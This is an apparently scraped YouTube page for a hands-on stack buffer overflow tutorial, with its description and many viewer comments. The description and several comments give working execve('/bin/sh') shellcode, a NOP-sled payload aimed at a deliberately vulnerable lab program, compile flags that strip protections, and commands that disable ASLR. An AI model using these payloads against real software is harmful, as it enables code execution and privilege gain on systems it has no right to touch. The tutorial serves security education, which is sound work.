How to exploit a buffer overflow vulnerability - Practical
Рет қаралды 272,012
This tutorial goes over the basic technique of how to exploit a buffer overflow vulnerability with an example.
This tutorial assumes that you already have: basic C knowledge, gdb, gcc and how programs represent memory.
The source code for the program can be downloaded at
drive.google.com/file/d/0B8b0M2LATseXYWRiVHdkaGhwRjg/view?usp=drivesdk&resourcekey=0-ZRMkh5rVq_hvXW6Nb-cb6A
The 46 byte shellcode (x86*) used in this program is "\x31\xc0\xb0\x46\x31\xdb\x31\xc9\xcd\x80\xeb\x16\x5b\x31\xc0\x88\x43\x07\x89\x5b\x08\x89\x43\x0c\xb0\x0b\x8d\x4b\x08\x8d\x53\x0c\xcd\x80\xe8\xe5\xff\xff\xff\x2f\x62\x69\x6e\x2f\x73\x68"
The compiling line is gcc -o example -fno-stack-protector -m32 -z execstack example.c
-fno-stack-protector === Removes the canary value at the end of the buffer
-m32 === Sets the program to compile into a 32 bit program
-z execstack === Makes the stack executable
NOTE: If this tutorial is not working it is likely that you have aslr enabled. To disable it run the following command in your terminal
echo 0 | sudo tee /proc/sys/kernel/randomize_va_space
When you are finished I strongly recommend you turn it back on with the command
echo 2 | sudo tee /proc/sys/kernel/randomize_va_space
If you enjoyed this tutorial and want to see more then please consider buying me a coffee! www.buymeacoffee.com/langotto. Definitely not required, but it definitely will be appreciated!
* If your computer uses ARM then this won't work... if you don't know what this means then as of 2021 it should work if it's not a Raspberry Pi, phone, or an Apple computer released after 2020.
@danielslater 2 жыл бұрын
My course "Ethical Hacking: Pentesting and Securing Web Applications" is 90% off for the next 5 days! www.udemy.com/course/web-security-fundamentals-how-to-hack-and-secure-web-apps/?couponCode=NEWYEAR2022 Sign up today for $10!
@khaelkugler 9 ай бұрын
Or just do portswigger labs
8 жыл бұрын
TL;DR. Most of you will get something like "Cannot access memory at address 0x...." That's because you have a 64 bit system installed. To get this work, use the $rsp register instead of $esp.
@danielslater 8 жыл бұрын
Another way around this is to use the compiler flags I've included in the description. One of them is -m32 which compiles it as a 32bit program
@cyancoyote7366 8 жыл бұрын
Nem gondoltam volna, hogy erre magyarral találkozok, hát de no.
@douglastorrance2922 8 жыл бұрын
thx
@motorheadbanger90 6 жыл бұрын
why not compile with the -m32 flag? convert it to 32 bits
@shell2673 5 жыл бұрын
at the end of the example i get Program received signal SIGSEGV, Segmentation Fault...how come?
@annablendermann 6 жыл бұрын
This really helped me understand the details of buffer overflows, thanks!
@vcm9837 7 жыл бұрын
This is a really good video. Thanks for the work. One question what is the return address. Is that the same thing as the memory address?
@fredxu9826 8 жыл бұрын
Hello, Daniel, Thanks for the great tutorial! I am new to this topic, so the question might be basic. I have a question regarding the shell code we want to execute in the end. what is '/x90' * 222 ? and after we add the shell code we want to execute, why do we add '/xd0/xce/xff/xff'?
@danielslater 8 жыл бұрын
+xu zeyuan Firstly, thanks for the compliment and I'm glad that you enjoyed it! '/x90' represents the hexidecimal encoding of the 'no operation' operation which in security is commonly referred to as a NOP. 'x90' is a NOP in assembly and we want to place as many as we can as if we put our shell code (code that 'pops a shell') after our NOPs then if we load start executing anywhere in our series of NOPs (commonly referred to as a nopsled) then it will keep running NOPs (doing nothing) until it reaches our actual code. '/xd0/xce/xff/xff' refers to the memory location that we want to 'jump to' so that we can execute our code. We put it at the end as we are overwriting the stack pointer which dictates which piece of code will be run next. If you want to know more I recommend my buffer overflow theory video
@purnact3741 8 жыл бұрын
I didn't understand that shellcode, how to write it ?
@danielslater 8 жыл бұрын
Shellcode isn't something that you actually have to write for yourself, it is fine to just get it from online resources. Unfortunately I don't have any videos on shellcode or any good resources I can point you to but a brief description is just that it's machine code translated into hexidecimal, commonly with the goal of 'popping a shell' or in other words gaining the privilege level of the running program
@paulifea7072 5 жыл бұрын
I'm in the midst of understanding buffer overflow, thank you good sir for sharing this awesome tutorial. I do have a few questions though: 1) Is this tutorial assuming that ASLR is enabled? 2) Also, I see a "push %ebp" instruction, followed by a "sub $0x110, %esp" instruction in your disassembled main function. Correct me if I'm wrong (my understanding of assembly code is very limited), but does that mean that the EBP gets pushed onto the stack, before the ESP shifts by 0x110 bytes (272 bytes) below the EBP register? 3) If so, can't I just find the memory address of the buffer (p &buffer command), add 0x110 bytes + 0x4 bytes(size of EBP register) to that memory address to find the exact location of the return address, and then overwrite that return address to point to an address that's above it, ie address of buffer + 0x110 bytes + 0x4 bytes(size of EBP register) + 0x4 bytes(size of return address)? Once again, thank you for sharing this video! (:
@yan793 3 жыл бұрын
hi sir, I am following all the steps, but my computer shows me the stack smashing, can I know why my terminal shows different things to me?
@kevin.afton_ 8 жыл бұрын
I did everything as in the description, I have Kali linux, I get segfault at 260 but after feeding the payload to it I cant get a bash just another segfault. Turned off aslr, canary, stack protection. By the way the +'BBBB' trick wont work for me either. If I do run $(python -c "print('A'*256 + 'BBBB')"), I still get 'A's: Program received signal SIGSEGV, Segmentation fault. 0x41414141 in ?? () If I do run $(python -c "print('A'*257 + 'BBBB')"), I get: Program received signal SIGSEGV, Segmentation fault. 0x00000000 in ?? () This is my payload: run $(python -c "print('\x90'*214 + '\x31\xc0\xb0\x46\x31\xdb\x31\xc9\xcd\x80\xeb\x16\x5b\x31\xc0\x88\x43\x07\x89\x5b\x08\x89\x43\x0c\xb0\x0b\x8d\x4b\x08\x8d\x53\x0c\xcd\x80\xe8\xe5\xff\xff\xff\x2f\x62\x69\x6e\x2f\x73\x68' + '\x10\xf0\xff\xbf')") I even tried to increase the stack address to '\x50\xf0\xff\xbf' but still get segfault. ==================== OK, I recompiled the code on an Ubuntu and I got the same results as you! :) I wonder what protection Kali can have that Ubuntu hasn't?
@markrayne5382 5 жыл бұрын
what version of Ubuntu did you use? I'm using Ubuntu 16.04 LTS and it won't work for me I am getting the exact same result as you did with Kali
@niektuytel7861 5 жыл бұрын
a question the /command how this working ????
@salimbelarbi1776 7 жыл бұрын
Hello, I have an exam this Monday and I am completely lost, please! Can you answer my questions: Question 0 What is the fault? What is the purpose of this service? Which versions are vulnerable? What version did you use? Question 1 What protections against this attack Question 2 !!! Structure of the stack just before the overflow Question 3 !! Structure of the string sent to overflow Question 4 !!! Structure of the stack just after the overflow Question 5 !! Where does the new return address point? How is it determined? Question 6! What code is at this address Question 7! What happens to the Shell code? Question 8 What does the Shell code do? Question 9 What does your attack do? Which file is introduced on the victim? How? What action does this file take? how?
@mangoKush12 7 жыл бұрын
Salim BELARBI did u pass ur exam??
@theone4808 2 жыл бұрын
Nice
@jamessn91able 4 жыл бұрын
$esp doesn’t work and neither does $rsp . I keep getting “No registers.”
@dane887 3 жыл бұрын
You have to quit after you copy. After you run blahblahblah. Then you disas main. You get your number, copy then quit. Open again then break *yournumber.
@mohamedwaellabidi9461 2 жыл бұрын
Macchanhzr 00:56:28:93:37:88
@mohamedwaellabidi9461 2 жыл бұрын
Vim
@AtlasMTBRider 5 жыл бұрын
to anyone getting : Cannot insert breakpoint 1. Cannot access memory at address xxxxxx the displayed memory addresses when you run disassemble main at first are not correct . to get the correct ones run the commands as follow: gdb ./example run aaaaawhatever disassemble main now you get the correct ones copy it and quit gdb gdb ./example break *the address you copied now running the command (run $(python ........) will work. Thanks for the video :)
@bedoce2599 5 жыл бұрын
Thank you!
@egeyolsal2647 5 жыл бұрын
i love you
@annapooranisnoolagam 5 жыл бұрын
it worked.. Thank you :)
@greycrow123 4 жыл бұрын
why though? why execute run? how does it reform the address values?
@rohankhandelwal7681 4 жыл бұрын
may god increase your life by (the same address which i copied) years
@RealKalleAnka 8 жыл бұрын
I must say, this is the best video tutorial I have come across explaining how to exploit a buffer overflow. Well done!
@haransivaram1847 6 жыл бұрын
I concur!
@b213videoz 4 жыл бұрын
I agree, the author even managed to explain the "little endian" bit even though he said he wouldn't explain that :-)
@shubhamshah3023 3 жыл бұрын
Ran the code with the flags you mentioned in description but still facing the same issue of cannot access memory at address. I am using Kali linux 32 bit version in VM Ware. Disabled ASLR. Any solution would be highly appreciated.
@pitkes159 10 ай бұрын
Don't forget to use python 2 not 3. Otherwise the NOP sled will not be created correctly!
@kooners6961 3 ай бұрын
So I almost made it. now it does attempt to spawn a shell, but I always end up getting a segmentation fault. I did compile it without stack protection to get it to work. For whatever reason, I can't get linux shellcode to work or launch
@nutritionalyeast7978 5 жыл бұрын
Whenever I set breakpoints in gdb and run, the gdb process just quits? It says "[1]+ Stopped gdb ./[filename]" with no other errors. I've tried disabling ASLR in a number of ways so I'm not sure why this is happening
@busyhacker63 4 жыл бұрын
mine quits like yours
@theish189 4 жыл бұрын
Same
@cursedfox4942 28 күн бұрын
Love this would have loved a little more explanation on the shell code tho would have gladly watched for 30 mins
@pennysmith5903 5 жыл бұрын
this might be the best tutorial ever, but I still couldn't understand my security homework
@abdulmuizzkelani3760 4 жыл бұрын
I hope you have been able to figure it out cos am still struggling with mine 😊
@rixlayer 4 жыл бұрын
Ah, finally, a comment i relate to.
@abdulmuizzkelani3760 4 жыл бұрын
@@rixlayer lol, looks like you were giving an assignment on buffer overflow also
@JosephShapiroTech 5 жыл бұрын
I followed along and everything is the same for me (the addresses etc.). My output at the end even looks the same, EXCEPT that I get a segfault instead of executing bin/sh (which shows in the nonsense output similar to how the video shows). Any tips as to why this might happen? I am on an Ubuntu VM. I compile with the command shown in the description and aslr is off. Any advice is appreciated!
@theresa4919 5 жыл бұрын
I have the same problem (just commenting to get notified about eventual answers).
@Hermaeus7 3 жыл бұрын
Bump for same issue. prints out ""....gibberish.../bin/sh...gibberish.." then segfaults.
@purnact3741 8 жыл бұрын
Bro, Great one ,Actually U have showed something practically done here. But I got some doubts. Firstly, I didn't properly understand Shell code concept. Where does it come from ? What does it ( /x30, /x40,x50...... etc ) mean ? Will it do the same functionality in every system( i mean any OS). I have seen the description in comments but didn't get though. And I have a few more I will ask them once I saw the video again carefully. thank u
@danielslater 8 жыл бұрын
Shellcode is machine code that is 'compiled' to hexidecimal commonly with the intention of 'popping a shell', or in other words gaining the privilege level of the program. Where does it come from? It is written by the hacker, usually with the intention of 'popping a shell' What does it ( /x30, /x40,x50...... etc ) mean? These are hexidecimal values that can be converted into processor instructions (if this doesn't make sense then do a bit of research on machine language) Will it do the same functionality in every system (I mean any OS)? Interesting question with an interesting answer! Machine code is instruction set dependant and therefore depends on the architecture of the CPU. The most common types you will run into are x86 (almost every desktop and laptop) and ARM (almost everything else). So in answer to your question it depends on the CPU not on the operating system, so if you write shellcode for a phone it most likely won't work on a computer and visa versa Hopefully that clears things up a bit
@sorrefly 3 жыл бұрын
You should use GDB to inspect the code and have an idea about the possible attack but since it inserts extra variables for debugging purpose, you'll have to del with the offset introduced.
@kooners6961 3 ай бұрын
the error says cannot insert breakpoint 1 and cannot access memory at address: (address name)
@ayanoayumu3764 8 жыл бұрын
thank you so much man. this video saved me on a homework assignment!
@craimucha7920 2 жыл бұрын
So, is all hacking done either through fuzzing or disassembling basically? what do ethical hackers do when they encounter a closed source porgram? thank you for the videos! you gto a subscribe from me
@danielslater 2 жыл бұрын
Funnily enough that’s not even 10% of what ethical hackers do! There’s also: setting up honeypots, various types of injection, social engineering, identifying broken access controls, insecure databases, client side vulnerabilities and a lot more! I get this question a lot so I made a course to give a more complete overview of what ethical hackers do! If you’re interested check it out www.udemy.com/course/web-security-fundamentals-how-to-hack-and-secure-web-apps/?referralCode=EE1801B01FC71B33E54F
@kooners6961 3 ай бұрын
at the end I it spawns, then says inferior 1 and exits normally
@danielslater 3 жыл бұрын
My Udemy course is 90% off for the next 5 days! www.udemy.com/course/web-security-fundamentals-how-to-hack-and-secure-web-apps/?couponCode=SHOUTOUT
@himiker 5 жыл бұрын
Everything seems to work, except at the end, the "/bin/sh" program isn't run. I get the following instead: Program received signal SIGILL, Illegal instruction. 0xb7e30a00 in __libc_start_main (main=0x804844d , argc=3, argv=0xbffff0a4, init=0x8048490 , fini=0x8048500 , rtld_fini=0xb7fed180 , stack_end=0xbffff09c) at libc-start.c:246 246 libc-start.c: No such file or directory. I also get this message when looking for the edge of the buffer: run $(python -c "print('A'*268 )") I know this is an old post, but if anyone has any ideas, I would greatly appreciate it.
@mathssoso4261 6 жыл бұрын
how did you create the pre-prepared shell code?
@seiv- 3 жыл бұрын
msfvenom:)
@yaseen7749 2 жыл бұрын
Thanks man, i got a reliable shellcode from your description. I was bugging my head for not spawning a new shell with my shellcode. It worked like a charm with your shellcode.
@liszt6832 5 жыл бұрын
What does "call" exactly mean? Calling a function we know?? But I still didn't understand what you mean.
@liszt6832 5 жыл бұрын
I didnt understand why you typed in x/200xb , why 200 ? Could someone explain?
@d1rtyharry378 5 жыл бұрын
First x means examine second one means hexadecimal form and b means byte. So basically the command says examine and print 200 of hexadecimal format registers each of a size of a byte.
@Arkata 3 жыл бұрын
Dude! Thank you!!! I'm studying for the Security + and I didn't understand the concept of Buffer Overflow because I couldn't picture it but thanks to your video I gained better understanding. The visual aspect is of great help to someone like me who knows nothing about software coding and programming. Thanks lots mate!!!
@kooners6961 3 ай бұрын
Almost have it, but it just won't spawn
@mohamedwaellabidi9461 2 жыл бұрын
No-ip
@wishmaster7062 8 жыл бұрын
Hello, i have a question. In this tutorial we can observe the address of the buffer start on the stack, to which we gonna ret from the strcpy, after we overflow the stack inside that function, it is 0xffffced0 right? But isnt this address gonna be different each time? I mean os is placing stack start address different each time ( or not ? ) So if the system would place the stack on some other address, that shellcode woudnt work. Am i right or not? Great tutorial by the way!
@danielslater 8 жыл бұрын
Awesome question! I'm glad you asked. So there is a lot going on here and because this is the classical hack OS's have evolved to make it harder. The thing that you're mentioning is called ASLR (to learn more about this check out my other security video called Common Computer Security Hurdles) which works to randomise where the memory is going to occur. This means we effectively need two vulnerabilities (one that allows us to view where the memory is) to allow us to use this technique. ASLR isn't the only thing working against us though, this can easily be turned off and then just from other programs executing the stack can change and the memory that is executed can change, the thing that makes this okay is that it typically doesn't move much if we do the tasks in close succession. This is also one of the key reasons why we need a NOPsled. So you are completely right that it is a problem but it can easily be circumvented
@wishmaster7062 8 жыл бұрын
+Daniel Slater thanks for the answer, looking forward to your videos
@JohnnyDepp-zu1if Жыл бұрын
Is there a course on udemy or that you know of that can teach me more about this in depth what is this called buffer overflow exploitation?
@jaeun91 6 жыл бұрын
when i try to find the size of buffer, i get Program received signal SIGSEGV, Segmentation fault. _IO_fgets (buf=0xbfffe847 "", n=9, fp=0x0) at iofgets.c:50 50 iofgets.c: No such file or directory. what am i doing wrong?
@문예진-b7x 4 жыл бұрын
In the end I get 'program received signal SIGILL, Illegal instruction'I don't know what is the problem...
@am566-h7m 7 жыл бұрын
Hello, nice video. But I keep getting the error "/bin/bash: ..... : Argument list too long" "bin/bash:... : Success ". What can I do to avoid this error?
@annoymousko288 2 жыл бұрын
In the end why is it showing random characters?
@HaqAhmed 2 жыл бұрын
Hi there, what if there are no call functions, but you still want to put a breakpoint under strcopy? Can you put a breakpoint on any of them or does it have to be specifically under a call function?
@wolfcompany2 3 жыл бұрын
(gdb) disas main No symbol table is loaded. Use the "file" command. i got this when i run disas main
@prudhviraj4358 7 жыл бұрын
hey daniel slater!! i got the return adress 0x41414141 at $(python -c"print('A'*260)") itself but when i use $(python -c"print('A'*256+'BBBB')") i get the return adress as 0x41414141. if i try with 262 or something then i am getiing a constant adress as 0x0804848a. Where am i going wrong? why am i not getting 0x42424242 as return adress?
@danielslater 7 жыл бұрын
Two things 1. Are you using the correct flags? 2. If 'A'*260 returns 0x41414141 it either means there has been an extreme coincidence (that will never occur unless the program is actually designed for that to occur but that's a discussion for another day) or 4 of your A's are already overwriting the buffer. Because of this if you try with 262it shouldn't work because we know that the return address is somewhere between 0 and 260. If on 256 it still prints 0x41414141 then try 252 and move down in increments of 4 until it returns 42's.
@prudhviraj4358 7 жыл бұрын
hey Daniel slater, i used all the flags and also disabled ASLR. i have found that my return adress is 4 bytes and located at (112th , 111th , 110th, 109th )positions. i have conluded this by using the command run $(python -c"print('C'*111+'A'*20+'B'*129). when i run this i get the error saying 0x41434343. Now how should i proceed further with this information?
@prudhviraj4358 7 жыл бұрын
i then used this command run $(python -c "print('\x90'*108+'\x00\xcf\xff\xff'+'\x31\xc0\xb0\x46\x31\xdb\x31\xc9\xcd\x80\xeb\x16\x5b\x31\xc0\x88\x43\x07\x89\x5b\x08\x89\x43\x0c\xb0\x0b\x8d\x4b\x08\x8d\x53\x0c\xcd\x80\xe8\xe5\xff\xff\xff\x2f\x62\x69\x6e\x2f\x73\x68'+'\x90'*102)") and then it says process exited normally, but there is no root shell grant. where am i going wrong?
@danielslater 7 жыл бұрын
Look at my off by one video and hopefully you'll learn what happened then. The buffer is definitely not at 109 given that the buffer is 256 bytes long. Unless there is a bug in the c compiler (that is triggered by basic problems) you're overwriting part of the return address but not the full thing
@prudhvi5313 7 жыл бұрын
Daniel Slater i got sucessfull in accessing the bin/sh... the above print command with the shell code works!!! Thank you so much dude!!! This is the best tutorial ever
@Henry_the_knight Жыл бұрын
This tutorial is amazing. Thank you so much for the work you put into it
@harbaapkabaap2040 5 жыл бұрын
You didn't mention one needs to make the stack executable for this, with the -zexecstack option to gcc while compiling. I found that the hard way but thanks for the video, it is very informative.
@mohamedwaellabidi9461 2 жыл бұрын
Add 2 eip
@pberson 8 жыл бұрын
Great job at really explain buffer overflows and how to exploit it.
@alex595659 9 ай бұрын
How do you know the adress return ?
@anamoly01 3 жыл бұрын
If he could provide source to study that little endian trick that would be awsum
@RivenbladeS 6 жыл бұрын
in 3:34 i have 4 bytes different and then it starts like \x41 \x41 ... example:\x03 \xd1 \x00 \x21 \x41 \x41 ... does this affect somehow the address 0xffffxde0?should i subtract something?
@novanuke1356 3 жыл бұрын
This was great! I do have to say that the clicking was a little distracting. I guess it was a labtop? Maybe a mic off of amazon would increase the quality of your videos
@muhitmustakim9399 6 жыл бұрын
Hi Daniel, thanks for the nice video. When I run from gdb getting below message: process 5989 is executing new program: /bin/dash Warning: Cannot insert breakpoint 1. Cannot access memory at address 0x8048471 When running the executable getting below error: �����/bin/sh���� Segmentation fault (core dumped) Any idea why?
@moshe6501 7 жыл бұрын
Using ubuntu 64bit...Not sure how this affects the process but I was not able to override the address of segmentation fault with the 'A' input...
@danielslater 7 жыл бұрын
Can you confirm that you compiled with the relevant flags and turned aslr off?
@moshe6501 7 жыл бұрын
It seems to do with stack canaries state at the default compiling...
@danielslater 7 жыл бұрын
Here is the compile line from the video description "gcc -o example -fno-stack-protector -m32 -z execstack example.c"
@sanhitaguha1135 5 жыл бұрын
@@danielslater I get the same error. I have compiled using m32 and turned off aslr
@ExposedExpert 3 жыл бұрын
@@sanhitaguha1135 Where you able to write the 'A' s? As I am having issues with that.
@lubangrololol2217 3 жыл бұрын
Hi, I wanted to ask if the shellcode you used is universal for every system, because I followed the tutorial exactly and in the end, the random non-printable characters appeared but I still received a segmentation fault and no shell opened. But maybe this has a different cause, I really just started getting in touch with these kind of exploits.
@eliddell1 6 жыл бұрын
late to the game here but i am not getting a shell and cant understand why my output shows //shh/bin instead of /bin/sh can you help?
@drwombat 2 жыл бұрын
How did we go from a simple c(pp?) Program to the python stuff... Are we passing the output of the python back into the c program? That's not really explained well here
@danielslater 2 жыл бұрын
It's a c program, the reason we use python is we're crafting an input for the c program. We could have typed over 200 A's but it makes sense to use automation where we can
@liwaiyip1769 5 жыл бұрын
No matter how I change the value of 'A' * num to 250, 260 or 1000, I cannot obtain something like 0x41414141. It just shows some normal address like: 0xb7f26411 in __kernal_vsyscall(). How should I proceed? :(
@moviez1794 4 жыл бұрын
Hello! Have you got a solution to this problem?( Got same
@gauravchauhan3832 3 жыл бұрын
I tried your method, copied every step but couldn't able to do it... Why so can anyone answer? Does gdb or gcc making doing something? Or is there any other reason
@danielslater 3 жыл бұрын
When asking for debugging help it's useful if you include information about what commands you're running and if anything about your setup is non-standard. Currently it's impossible to give you useful advice
@user-yn4nj2ik9h 3 жыл бұрын
What should i do if my esp starts in middle of address and not at the start of the line?
@Makingfinancialdecisions 2 жыл бұрын
I am new to these concepts and this process. With that being said is this the command prompt for Ubuntu?
@danielslater 2 жыл бұрын
Yes it is
@markrayne5382 5 жыл бұрын
Hi Daniel first off great tutorial :) I seem to be getting an error like most people on here liek another user prud says "! i got the return adress 0x41414141 at $(python -c"print('A'*260)") itself but when i use $(python -c"print('A'*256+'BBBB')") i get the return adress as 0x41414141." this exact thing is happening to me,I went down in multiples of 4 but when I did I got no seg fault the seg fault only occurs when the total value is 260 any idea why? thanks (note my ASLR and stack protector is turned off)
@toolsx8677 5 жыл бұрын
Hi Daniel i am trying but tell me someone please memory converted address to endian is from where ? how did you took this address ?
@Kimberly-zz4te 6 ай бұрын
This was so confusing. I don’t understand this.
@aneelasafdar7278 6 жыл бұрын
I use \x90 with assumption that it will store as a single byte in memory, but it doesn't. It gets store as it is with hex values 3039785c. Even file storing these input or shell code also take more memory than exact no of bytes in them. I am on 64 byte machine and compiling program using m32.
@danielslater 6 жыл бұрын
I've addressed this in other comments but you have to think about how memory is stored in C. The short explanation is that padding is added to memory to make it more efficient to access
@John_X_GR 6 жыл бұрын
Hello Daniel :) Can i ask you one thing? Why is your stack or disas main, different than mine? Firstly, I've tried to compile with your line, both with my ubuntu linux, and my kali linux but both of them when compiling, they said it was missing different .h files at each of them, which i installed the corresponding libraries. Both of them worked fine, but both of them, have different stack or disas main, from yours ... whys that? i didnt try to go further from there, because i dont know assembly code and dont know further. Please can you help me? Or know whys that, or is it natural?
@markrayne5382 5 жыл бұрын
same here did you fix the problem?
@liviomichaelmelatti8236 7 жыл бұрын
can I see a screenshot of what your shellcode looks like in memory. x/100xb 0xbfff070 or something like that with the shell code in there?
@mancubius 3 жыл бұрын
For what kind of architecture is this shellcode ?
@danielslater 3 жыл бұрын
TLDR: 32bit x86 Excellent question. When I made the video x86 was the dominant architecture and it didn't seem like ARM was going to be anywhere near it is today so I didn't even think of other architectures. It's x86 on a 32bit virtual machine running on a 64bit mac.
@mancubius 3 жыл бұрын
@@danielslater Wow thank you for your prompt reply! I was testing it myself last night on a kali-linux 2020.4 64bit. I am using windows 10 64 bit on intel i9-9900k Was also running in virtual machine so I was wondering when I am looking for shellcode exploits what should I look for? Do I need to install a 32bit Linux? If I do so, do I need a shell code which targets the OS of the virtual machine?
@dejanahmetovic612 6 жыл бұрын
Hello , while using GDB I am not able to see the function names on the right hand side. ex. any help on how to get that there
@danielslater 6 жыл бұрын
So maybe what I've got there is a bit deceptive because it's an exceptionally simple example. The reason strcpy comes up is because it's an inbuilt call, if you create your own function and call it then you can't get the name from the executable because it's simply not stored (it's possible there are compiler flags you can get to get it to store them but not that I know of) If you're interested in learning more about reverse engineering I'd recommend doing an online course in it or writing your own simple programs and dissembling them to start seeing basic patterns, if you take the second approach I'd recommend looking a bit more into compiler flags because there can be tricks like inlining which could throw you off
@b00i00d 4 жыл бұрын
disas, lol This term could be straight outta hip hop...
@mohamedwaellabidi9461 2 жыл бұрын
Buy somethibg
@mohamedwaellabidi9461 2 жыл бұрын
Memory curreption
@anuraagsinha9447 7 жыл бұрын
You need to compile this with debugging options correct? on any system you're trying to hack they obviously arent going to give that to you so do people just use trial and error in order to find their memory locations?
@westernvibes1267 4 жыл бұрын
Hello script kiddies. This is a hacker.
@eliddell1 6 жыл бұрын
can you explain how to write the shell code?
@srcmake 6 жыл бұрын
Great explanation, and concise example. Thanks.
@user-11528 3 жыл бұрын
why my machine code is twice as long as yours
@miloradowicz 6 жыл бұрын
Can you actually execute code in stack-segment? Isn't there supposed to be a protection that separates code from data and won't allow to treat the latter as the former?
@mohamedwaellabidi9461 2 жыл бұрын
Change icon
@Beulzabob 7 жыл бұрын
Great explanation. Thank you for the details!
@mohamedwaellabidi9461 2 жыл бұрын
Nano
@mohamedwaellabidi9461 2 жыл бұрын
Call
@mohamedwaellabidi9461 2 жыл бұрын
Jmp
@DS-mg8zx 6 жыл бұрын
Thank you so much for this! Practical and easy to understand.
@droslean1 7 жыл бұрын
Hey Dan , Nice example. But for me its not working. I get : Program received signal SIGSEGV, Segmentation fault. 0xf7e68929 in ptmalloc_init.part () from /usr/lib32/libc.so.6 Any ideas ?
@danielslater 7 жыл бұрын
Can you confirm that you used the compile line in the video description? I'm willing to bet that's a canary
@droslean1 7 жыл бұрын
Yes.I compiled it that way
@kooners6961 5 жыл бұрын
So I got the m32 to work, but I still cant insert breakpoints one and access the address
@bhavitarunch5539 6 жыл бұрын
I am getting no such file or directory when use gdb ./example
@danielslater 6 жыл бұрын
Learning this type of security if you have no programming background is impossible. I'd strongly recommend learning some basic C before trying to broach low level security
@niyazmurshed 8 жыл бұрын
Hey sorry to ask so many ques.... I get the following after running.... /bin/dash: 0: Can't open ����������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������1��F1�1�̀�[1��C��C � ��S �����/bin/sh���� [Inferior 1 (process 9130) exited with code 0177] ANy idea what could be the prob ?
@danielslater 8 жыл бұрын
Are you running this in gdb?
@karimbarakat7732 4 жыл бұрын
Excellent explanation thank you. Can you advise on how you developed the machine code that you ran to get shell to start.
@danielslater 4 жыл бұрын
The way that most people do it is they have a list of around 10 shellcodes for various situations, most commonly: a really short one for really small buffers, a very reliable one when the buffer is large, and several which don't characters which are often escaped. If you still feel the need to make your own then you can write basic programs in a compiled language (I'd recommend one with few abstractions such as C), and use "objdump -d /path/to/compiled/program"
@RivenbladeS 6 жыл бұрын
in 6:37 how do i make my injection program compile to hex bytes?
@melledijkstra5543 7 жыл бұрын
What if the stored input is much smaller like $(python -c "print('A'*28+'BBBB')")? The shell code is 46 bytes. He subtracts it from the 268 (in my case 28). That doesn't fit right?
@danielslater 7 жыл бұрын
Yeah that doesn't fit. In reality you need a pretty large buffer because without a NOPSLED you'll need either a lot of luck or a lot of attempts to actually get the right starting address
@melledijkstra5543 7 жыл бұрын
Daniel Slater Or maybe need smaller shellcode? I'd don't need to get a shell though, just need contents of a file which I can't access (for a challenge just to be clear). This should possible with smaller shellcode I guess. But I'll need to write that myself somehow. Do you have any tuts on how to do that? Thx for the video!
@danielslater 7 жыл бұрын
It's probably worth going into how to write shellcode, I don't have any videos on it but it shouldn't be too hard to find
@kylin3197 7 жыл бұрын
What do you do if you try this for a different program and don't find a bunch of 41's...
@danielslater 7 жыл бұрын
Unfortunately this is out of the scope of this youtube channel as the answer gets extremely long extremely fast. A lot of security is knowing a lot of techniques for doing something and hoping one works, so I would suggest doing a full pen testing course
@thomasathanasiou1661 7 жыл бұрын
Is there an assembly code that produces the shellcode that you used?
@danielslater 7 жыл бұрын
I don't have it readily available but if you want I'm sure you could convert it pretty quickly. Shellcode is the sort of thing that is good to write a few times to get an idea of what it actually is and what's happening but most people just get stuff online because there really isn't any benefit to writing it yourself. If you want to look at example shellcode and the conversion then check out this link shell-storm.org/shellcode/files/shellcode-827.php
@shell2673 5 жыл бұрын
msfvenom
@mikemazza404 4 жыл бұрын
Hi Daniel, Thank you for posting this video, this is very helpful. I do have a couple questions for you though. 1) Have you posted the programs so that people can recreate this exercise on their own? If not, which programs are needed? 2) Do you have another video/tutorial on how to secure against a buffer overflow exploit? Thanks in advance!
@pberson 8 жыл бұрын
I can not get the shell to pop at the end. I wonder is it this: (gdb) run $(python -c "print('A'*260)") The program being debugged has been started already. Start it from the beginning? (y or n) y Starting program: /home/pete/bufferoverflow/example $(python -c "print('A'*260)") AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA Program received signal SIGSEGV, Segmentation fault. 0x41414141 in ?? () (gdb) run $(python -c "print('A'*260+'BBBB')") The program being debugged has been started already. Start it from the beginning? (y or n) y Starting program: /home/pete/bufferoverflow/example $(python -c "print('A'*260+'BBBB')") AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABBBB Program received signal SIGSEGV, Segmentation fault. 0x0804848a in main () I do not get 0x42424242 in ?? () I think this is my problem.
@lonewanderer1776 8 жыл бұрын
same
@lonewanderer1776 8 жыл бұрын
Something got to do with the OS are you using debian or ubuntu?
@pberson 8 жыл бұрын
I am using Ubuntu 16.02
@danielslater 8 жыл бұрын
What compiler settings are you using? If you don't use the proper compiler settings and turn ASLR off then it won't work
@pberson 8 жыл бұрын
Test with both the correct complier setting and ASLR off
@Darieee 5 жыл бұрын
impressive skills thanks for the tutorial !!
@gordoburrito2951 7 жыл бұрын
What happens if the size of the buffer is smaller than the bytes of the shellcode?
@danielslater 7 жыл бұрын
Then you can't use that shell code so you'll either need to shorter shellcode, use some of the already written code as part of your shellcode or use another approach such as ret2libc
SQUAD NYEMIL
Рет қаралды 14 МЛН